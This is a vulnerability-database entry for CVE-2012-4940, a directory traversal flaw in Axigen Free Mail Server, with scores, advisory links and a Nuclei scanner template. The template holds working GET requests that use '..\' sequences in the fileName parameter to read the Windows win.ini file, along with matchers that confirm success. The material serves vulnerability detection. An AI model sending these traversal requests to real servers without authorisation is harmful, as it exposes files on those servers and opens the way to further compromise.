Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nucleiProjectDiscoveryNUCLEI:CVE-2012-4940
HistoryNov 15, 2021 - 3:47 p.m.

Axigen Mail Server Filename Directory Traversal

2021-11-1515:47:27
ProjectDiscovery
github.com
4

6.4 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:P/A:N

6.7 Medium

AI Score

Confidence

Low

0.13 Low

EPSS

Percentile

95.5%

JSON

Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a … (dot dot) in the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in an edit or delete action to the default URI.

id: CVE-2012-4940

info:
  name: Axigen Mail Server Filename Directory Traversal
  author: dhiyaneshDk
  severity: medium
  description: Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in an edit or delete action to the default URI.
  impact: |
    An attacker can read sensitive files, potentially leading to unauthorized access, data leakage, or further compromise of the server.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in Axigen Mail Server.
  reference:
    - https://www.exploit-db.com/exploits/37996
    - https://nvd.nist.gov/vuln/detail/CVE-2012-4940
    - http://www.kb.cert.org/vuls/id/586556
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:N
    cvss-score: 6.4
    cve-id: CVE-2012-4940
    cwe-id: CWE-22
    epss-score: 0.16414
    epss-percentile: 0.95998
    cpe: cpe:2.3:a:gecad:axigen_free_mail_server:-:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: gecad
    product: axigen_free_mail_server
  tags: cve,cve2012,edb,axigen,lfi,mail,gecad

http:
  - method: GET
    path:
      - '{{BaseURL}}/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\..\..\windows\win.ini'
      - '{{BaseURL}}/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\..\..\windows\win.ini'

    stop-at-first-match: true
    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and
# digest: 490a0046304402205123649a5c5a0cf48e5504f37641df07c39118a5bf9d04602c312ddaf1829f4a02200d0a386529b388651d5e905d36a1424e739186e1aad43157264eefa4369d25dc:922c64590222798bb761d5b6d8e72950

Related

cert 1
cvelist 1
cve 1
nvd 1
checkpoint_advisories 1
prion 1
cert
cert
Axigen Mail Server directory traversal vulnerability
2012-10-31 00:00:00
cvelist
cvelist
CVE-2012-4940
2012-10-31 19:00:00
cve
cve
CVE-2012-4940
2012-10-31 19:55:00
nvd
nvd
CVE-2012-4940
2012-10-31 19:55:00
checkpoint_advisories
checkpoint_advisories
Axigen Arbitrary File Read and Delete (CVE-2012-4940)
2013-06-09 00:00:00
prion
prion
Directory traversal
2012-10-31 19:55:00

6.4 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:P/A:N

6.7 Medium

AI Score

Confidence

Low

0.13 Low

EPSS

Percentile

95.5%

JSON
Related for NUCLEI:CVE-2012-4940
cert1cvelist1cve1nvd1checkpoint_advisories1prion1